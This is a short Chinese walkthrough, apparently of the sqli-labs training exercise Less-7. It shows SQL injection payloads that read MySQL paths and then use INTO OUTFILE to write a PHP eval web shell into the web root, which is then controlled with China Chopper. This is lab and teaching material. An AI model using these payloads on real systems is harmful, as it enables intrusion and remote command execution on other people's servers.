SQLI DUMB SERIES-7

(1)查看PHP源代码

SQLI DUMB SERIES-7

可以看见输入的id被一对单引号和两对圆括号包围

(2)根据提示:Dump into Outfile可知,此次攻击需要导出文件

(3)在第一关获取

@@datadir 读取数据库路径
@@basedir MYSQL 获取安装路径

 

?id=2' union select 1,@@datadir,@@basedir --+

 

SQLI DUMB SERIES-7

(4)修改MySql配置,以让能在D盘写入文件(MySQL->my.ini)

SQLI DUMB SERIES-7

(5)payload如下

?id=1')) union select 1,'2','<?php @eval($_POST["cmd"]);?>' into outfile 'D:\\phpStudy\\PHPTutorial\\WWW\\1234.php' --+

 SQLI DUMB SERIES-7

尽管显示错误,但在所写目录里有已经写好了文件

SQLI DUMB SERIES-7

(6)运行中国菜刀

SQLI DUMB SERIES-7

SQLI DUMB SERIES-7

至此,攻击完成!

 

相关文章:

  • 2021-04-04
  • 2022-12-23
  • 2022-02-07
  • 2021-10-30
  • 2021-10-25
  • 2022-12-23
  • 2022-01-10
  • 2021-04-21
猜你喜欢
  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
  • 2021-06-10
  • 2021-10-26
  • 2021-08-25
相关资源
相似解决方案